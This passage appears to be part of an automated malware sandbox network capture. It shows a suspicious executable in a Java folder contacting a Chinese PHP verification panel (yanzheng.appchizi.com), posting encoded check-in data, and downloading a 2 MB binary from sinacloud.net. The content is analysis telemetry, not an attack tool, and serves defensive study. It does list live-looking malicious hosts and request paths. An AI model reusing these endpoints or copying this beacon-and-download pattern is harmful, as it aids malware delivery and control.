                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>--M17-P272 </title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /><meta name="" content="Version M17-P272" /><meta name="" content=" http://www.hphu.com QQ188372002" /><script type="text/javascript" src="/kss_inc/js/jquery.1.3.2.pack.js" charset="utf-8"></script><link rel="shortcut icon" href="/favicon.ico" /><style>a{font-size:12px;color:#666;text-decoration:none;}body{background:#ffffff url(../kss_inc/images/login_01.png)
                                                                                                                                    Aug 6, 2024 10:29:20.689342022 CEST224INData Raw: 20 72 65 70 65 61 74 2d 78 3b 7d 0d 0a 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 69 6e 70 75 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 0d 0a 23 75 73 65 72 6e 61 6d 65 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                    Data Ascii: repeat-x;}form{margin:0;padding:0}input{font-size:12px}#username{background:url(../kss_inc/images/user1.png) no-repeat;border:1px solid #ccc;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#p
                                                                                                                                    Aug 6, 2024 10:29:20.689359903 CEST1236INData Raw: 61 73 73 77 6f 72 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 46 69 78 65 64 73 79 73 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 6b 73
                                                                                                                                    Data Ascii: assword{font-size:12px;font-family: Fixedsys;line-height:24px;background:url(../kss_inc/images/passwordt.png) no-repeat;border:1px solid #ccc;color:#fff;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#input3{background
                                                                                                                                    Aug 6, 2024 10:29:20.689382076 CEST1236INData Raw: 69 6f 6e 28 29 7b 0d 0a 24 28 22 23 63 68 6b 69 6d 67 22 29 2e 61 74 74 72 28 22 73 72 63 22 2c 22 2e 2f 6c 6f 67 69 6e 69 6d 67 2e 70 68 70 3f 72 6e 64 69 64 3d 22 2b 73 54 69 6d 65 28 29 29 3b 0d 0a 7d 29 3b 0d 0a 0d 0a 24 28 22 23 70 61 73 73
                                                                                                                                    Data Ascii: ion(){$("#chkimg").attr("src","./loginimg.php?rndid="+sTime());});$("#password").bind("click",function(){var c1=$(this).offset();$("#psssdiv").css({top:c1.top+5,left:c1.left+40});$(this).val("");$("#psssdiv").text("");});
                                                                                                                                    Aug 6, 2024 10:29:20.689393997 CEST1156INData Raw: 6f 67 69 6e 5f 30 35 2e 70 6e 67 29 3b 22 20 77 69 64 74 68 3d 22 35 31 37 22 20 68 65 69 67 68 74 3d 22 31 39 30 22 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 32 33 30 22 20 68 65 69 67 68 74 3d 31
                                                                                                                                    Data Ascii: ogin_05.png);" width="517" height="190" align=center><table width="230" height=100" border="0" cellpadding="0" cellspacing="0" align=center><tr><td colspan=2><input type="text" value="" name="username" id="username" maxlength="15" AUTOCO


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    24192.168.2.6497418.218.30.15180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:19.734055996 CEST205OUTGET /kss_admin/ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Host: yanzheng.appchizi.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:20.680211067 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:20 GMT
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Content-Length: 4575
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-Powered-By: PHP/5.3.29
                                                                                                                                    Set-Cookie: PHPSESSID=e2a7295be6209a82ad1c02a14d42149e; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Range: bytes 0-4574/4575
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 2d 2d 4d 31 37 2d 50 32 37 32 20 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 e6 9c 8d e5 8a a1 e7 ab af e7 89 88 e6 9c ac 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>--M17-P272 </title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /><meta name="" content="Version M17-P272" /><meta name="" content=" http://www.hphu.com QQ188372002" /><script type="text/javascript" src="/kss_inc/js/jquery.1.3.2.pack.js" charset="utf-8"></script><link rel="shortcut icon" href="/favicon.ico" /><style>a{font-size:12px;color:#666;text-decoration:none;}body{background:#ffffff url(../kss_inc/images/login_01.png) repeat-x;}form{margin:0;padding:0}input{font-size:12px}#username{bac
                                                                                                                                    Aug 6, 2024 10:29:20.680553913 CEST188INData Raw: 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 6b 73 73 5f 69 6e 63 2f 69 6d 61 67 65 73 2f 75 73 65 72 31 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 77 69 64 74 68 3a 32 30 30
                                                                                                                                    Data Ascii: kground:url(../kss_inc/images/user1.png) no-repeat;border:1px solid #ccc;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#password{font-size:12px;font-family: Fix
                                                                                                                                    Aug 6, 2024 10:29:20.696383953 CEST1236INData Raw: 65 64 73 79 73 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 6b 73 73 5f 69 6e 63 2f 69 6d 61 67 65 73 2f 70 61 73 73 77 6f 72 64 74 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62
                                                                                                                                    Data Ascii: edsys;line-height:24px;background:url(../kss_inc/images/passwordt.png) no-repeat;border:1px solid #ccc;color:#fff;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#input3{background:url(../kss_inc/images/password2.png) n
                                                                                                                                    Aug 6, 2024 10:29:20.696398020 CEST1236INData Raw: 6e 69 6d 67 2e 70 68 70 3f 72 6e 64 69 64 3d 22 2b 73 54 69 6d 65 28 29 29 3b 0d 0a 7d 29 3b 0d 0a 0d 0a 24 28 22 23 70 61 73 73 77 6f 72 64 22 29 2e 62 69 6e 64 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 63 31
                                                                                                                                    Data Ascii: nimg.php?rndid="+sTime());});$("#password").bind("click",function(){var c1=$(this).offset();$("#psssdiv").css({top:c1.top+5,left:c1.left+40});$(this).val("");$("#psssdiv").text("");});$("#password").bind("keyup",function(){
                                                                                                                                    Aug 6, 2024 10:29:20.696412086 CEST376INData Raw: 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 32 33 30 22 20 68 65 69 67 68 74 3d 31 30 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63
                                                                                                                                    Data Ascii: align=center><table width="230" height=100" border="0" cellpadding="0" cellspacing="0" align=center><tr><td colspan=2><input type="text" value="" name="username" id="username" maxlength="15" AUTOCOMPLETE="off"><br><br></td></tr><tr>
                                                                                                                                    Aug 6, 2024 10:29:20.787349939 CEST741INData Raw: 72 3e 0d 0a 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 32 20 61 6c 69 67 6e 3d 6c 65 66 74 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 69 6d 67 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 36 22 20 41 55 54 4f
                                                                                                                                    Data Ascii: r><td colspan=2 align=left><input type="text" name="loginimg" maxlength="6" AUTOCOMPLETE="off" id="input3"><div style="position:relative;"><img id="chkimg" src="./loginimg.php?rndid=1722932960"></div></td></tr><tr><td width=120 nowarp>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    25192.168.2.64974247.242.126.20580420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:19.735825062 CEST205OUTGET /kss_admin/ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Host: yanzheng.appchizi.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:20.672442913 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:20 GMT
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Content-Length: 4575
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-Powered-By: PHP/5.3.29
                                                                                                                                    Set-Cookie: PHPSESSID=a87e1c6d95552e8111da3848181620c6; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Range: bytes 0-4574/4575
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 2d 2d 4d 31 37 2d 50 32 37 32 20 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 e6 9c 8d e5 8a a1 e7 ab af e7 89 88 e6 9c ac 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>--M17-P272 </title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /><meta name="" content="Version M17-P272" /><meta name="" content=" http://www.hphu.com QQ188372002" /><script type="text/javascript" src="/kss_inc/js/jquery.1.3.2.pack.js" charset="utf-8"></script><link rel="shortcut icon" href="/favicon.ico" /><style>a{font-size:12px;color:#666;text-decoration:none;}body{background:#ffffff url(../kss_inc/images/login_01.png) repeat-x;}form{margin:0;padding:0}input{font-size:12px}#username{bac
                                                                                                                                    Aug 6, 2024 10:29:20.672473907 CEST188INData Raw: 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 6b 73 73 5f 69 6e 63 2f 69 6d 61 67 65 73 2f 75 73 65 72 31 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 77 69 64 74 68 3a 32 30 30
                                                                                                                                    Data Ascii: kground:url(../kss_inc/images/user1.png) no-repeat;border:1px solid #ccc;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#password{font-size:12px;font-family: Fix
                                                                                                                                    Aug 6, 2024 10:29:20.688518047 CEST1236INData Raw: 65 64 73 79 73 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 6b 73 73 5f 69 6e 63 2f 69 6d 61 67 65 73 2f 70 61 73 73 77 6f 72 64 74 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62
                                                                                                                                    Data Ascii: edsys;line-height:24px;background:url(../kss_inc/images/passwordt.png) no-repeat;border:1px solid #ccc;color:#fff;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#input3{background:url(../kss_inc/images/password2.png) n
                                                                                                                                    Aug 6, 2024 10:29:20.688543081 CEST1236INData Raw: 6e 69 6d 67 2e 70 68 70 3f 72 6e 64 69 64 3d 22 2b 73 54 69 6d 65 28 29 29 3b 0d 0a 7d 29 3b 0d 0a 0d 0a 24 28 22 23 70 61 73 73 77 6f 72 64 22 29 2e 62 69 6e 64 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 63 31
                                                                                                                                    Data Ascii: nimg.php?rndid="+sTime());});$("#password").bind("click",function(){var c1=$(this).offset();$("#psssdiv").css({top:c1.top+5,left:c1.left+40});$(this).val("");$("#psssdiv").text("");});$("#password").bind("keyup",function(){
                                                                                                                                    Aug 6, 2024 10:29:20.688555956 CEST376INData Raw: 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 32 33 30 22 20 68 65 69 67 68 74 3d 31 30 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63
                                                                                                                                    Data Ascii: align=center><table width="230" height=100" border="0" cellpadding="0" cellspacing="0" align=center><tr><td colspan=2><input type="text" value="" name="username" id="username" maxlength="15" AUTOCOMPLETE="off"><br><br></td></tr><tr>
                                                                                                                                    Aug 6, 2024 10:29:20.774897099 CEST741INData Raw: 72 3e 0d 0a 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 32 20 61 6c 69 67 6e 3d 6c 65 66 74 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 69 6d 67 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 36 22 20 41 55 54 4f
                                                                                                                                    Data Ascii: r><td colspan=2 align=left><input type="text" name="loginimg" maxlength="6" AUTOCOMPLETE="off" id="input3"><div style="position:relative;"><img id="chkimg" src="./loginimg.php?rndid=1722932960"></div></td></tr><tr><td width=120 nowarp>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    26192.168.2.6497438.212.11.14780420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:19.738447905 CEST205OUTGET /kss_admin/ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Host: yanzheng.appchizi.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:20.693689108 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:20 GMT
                                                                                                                                    Server: Apache/2.4.10 (Debian) PHP/5.3.29
                                                                                                                                    X-Powered-By: PHP/5.3.29
                                                                                                                                    Set-Cookie: PHPSESSID=efd4ed7588a85183cbc21ba291134592; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Range: bytes 0-4574/4575
                                                                                                                                    Content-Length: 4575
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 2d 2d 4d 31 37 2d 50 32 37 32 20 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 e6 9c 8d e5 8a a1 e7 ab af e7 89 88 e6 9c ac 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>--M17-P272 </title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /><meta name="" content="Version M17-P272" /><meta name="" content=" http://www.hphu.com QQ188372002" /><script type="text/javascript" src="/kss_inc/js/jquery.1.3.2.pack.js" charset="utf-8"></script><link rel="shortcut icon" href="/favicon.ico" /><style>a{font-size:12px;color:#666;text-decoration:none;}body{background:#ffffff url(../kss_inc/images/login_01.png)
                                                                                                                                    Aug 6, 2024 10:29:20.693727970 CEST1236INData Raw: 20 72 65 70 65 61 74 2d 78 3b 7d 0d 0a 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 69 6e 70 75 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 0d 0a 23 75 73 65 72 6e 61 6d 65 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                    Data Ascii: repeat-x;}form{margin:0;padding:0}input{font-size:12px}#username{background:url(../kss_inc/images/user1.png) no-repeat;border:1px solid #ccc;width:200px;height:28px;padding:0 0 0 40px;margin:0;line-height:28px;}#password{font-size:1
                                                                                                                                    Aug 6, 2024 10:29:20.693742990 CEST1236INData Raw: 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 69 6d 67 74 69 6d 65 3d 73 54 69 6d 65 28 29 3b 0d 0a 24 28 22 23 69 6e 70 75 74 33 22 29 2e 62 69 6e 64 28 22 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 69 66 28 73
                                                                                                                                    Data Ascii: ).ready(function(){imgtime=sTime();$("#input3").bind("focus",function(){if(sTime()-imgtime>50*1000){$("#chkimg").attr("src","./loginimg.php?rndid="+sTime());imgtime=sTime();}});$("#chkimg").bind("click",function(){$("#chkimg"
                                                                                                                                    Aug 6, 2024 10:29:20.693804979 CEST1236INData Raw: 2f 6c 6f 67 69 6e 5f 30 33 2e 70 6e 67 29 3b 22 20 20 77 69 64 74 68 3d 22 35 31 37 22 20 68 65 69 67 68 74 3d 22 32 33 39 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 0d 0a 3c 74 64 20 72 6f 77 73 70 61 6e 3d 22 33 22 20 73 74 79 6c 65 3d 22 62 61 63
                                                                                                                                    Data Ascii: /login_03.png);" width="517" height="239">&nbsp;</td><td rowspan="3" style="background:url(../kss_inc/images/login_04.png);" width="215" height="560">&nbsp;</td></tr><tr><td style="background:url(../kss_inc/images/login_05.png);" widt
                                                                                                                                    Aug 6, 2024 10:29:20.693819046 CEST144INData Raw: 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 64 69 76 20 69 64 3d 27 70 73 73 73 64 69 76 27 3e e8 af b7 e8 be 93 e5 85 a5 e5 af 86 e7 a0 81 ef bc 8c e6 94 af e6 8c 81 e4 b8 ad e6 96 87 3c 2f 64 69 76 3e 3c 64 69 76 20 69
                                                                                                                                    Data Ascii: td></tr></table><div id='psssdiv'></div><div id="psssdiv2"></div><script></script></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    27192.168.2.6497448.218.87.780420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:21.509418011 CEST375OUTPOST /kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1kstoken80597805589 HTTP/1.1
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Language: zh-cn
                                                                                                                                    Referer: http://yanzheng.appchizi.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; )
                                                                                                                                    Content-Length: 126
                                                                                                                                    Host: yanzheng.appchizi.com
                                                                                                                                    Aug 6, 2024 10:29:21.509438992 CEST126OUTData Raw: 6d 3d 37 44 35 32 39 42 45 31 45 43 30 37 42 36 35 43 42 33 41 31 36 33 42 41 30 41 45 42 37 35 31 31 26 6f 3d 5f 44 61 74 61 5f 4c 79 4f 59 47 37 4e 4a 43 63 51 34 42 73 59 57 79 57 46 61 50 78 72 6e 32 7a 68 55 61 64 48 64 70 6d 65 4d 56 5f 76
                                                                                                                                    Data Ascii: m=7D529BE1EC07B65CB3A163BA0AEB7511&o=_Data_LyOYG7NJCcQ4BsYWyWFaPxrn2zhUadHdpmeMV_vXn8ASLAh6U6wfpWybLSx6PCThDcQvheAreV_JvPBPAG=
                                                                                                                                    Aug 6, 2024 10:29:22.451263905 CEST435INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:22 GMT
                                                                                                                                    Server: Apache/2.4.10 (Debian) PHP/5.3.29
                                                                                                                                    X-Powered-By: PHP/5.3.29
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Length: 171
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Data Raw: 3c 78 6d 6c 3e 3c 73 74 61 74 65 3e 31 30 30 3c 2f 73 74 61 74 65 3e 3c 6d 65 73 73 61 67 65 3e e5 8f 96 e8 bd af e4 bb b6 e4 bf a1 e6 81 af e6 88 90 e5 8a 9f 3c 2f 6d 65 73 73 61 67 65 3e 3c 75 70 73 65 74 3e 30 3c 2f 75 70 73 65 74 3e 3c 73 6f 66 74 76 65 72 3e 31 3c 2f 73 6f 66 74 76 65 72 3e 3c 73 6f 66 74 64 6f 77 6e 75 72 6c 3e 68 74 74 70 3a 2f 2f 3c 2f 73 6f 66 74 64 6f 77 6e 75 72 6c 3e 3c 79 7a 70 6c 3e 31 35 3c 2f 79 7a 70 6c 3e 3c 73 6f 66 74 67 67 3e 3c 2f 73 6f 66 74 67 67 3e 3c 2f 78 6d 6c 3e
                                                                                                                                    Data Ascii: <xml><state>100</state><message></message><upset>0</upset><softver>1</softver><softdownurl>http://</softdownurl><yzpl>15</yzpl><softgg></softgg></xml>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    28192.168.2.64975127.221.16.14980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:34.080423117 CEST232OUTGET /operate/11133 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: sinacloud.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:35.410968065 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:32 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 2055055
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-RequestId: ff38b1f2-2408-0616-2935-58c7acc7b116
                                                                                                                                    X-Requester: GRPS000000ANONYMOUSE
                                                                                                                                    Last-Modified: Mon, 05 Aug 2024 03:47:37 GMT
                                                                                                                                    X-Filesize: 2055055
                                                                                                                                    ETag: "c445e228c1d2b855ca691b34182c8b68"
                                                                                                                                    x-amz-meta-crc32: F5269915
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    Access-Control-Allow-Headers: Origin, Content-Type, Accept, Range, Content-Length
                                                                                                                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS, HEAD
                                                                                                                                    Access-Control-Max-Age: 31536000
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Content-Range: bytes 0-2055054/2055055
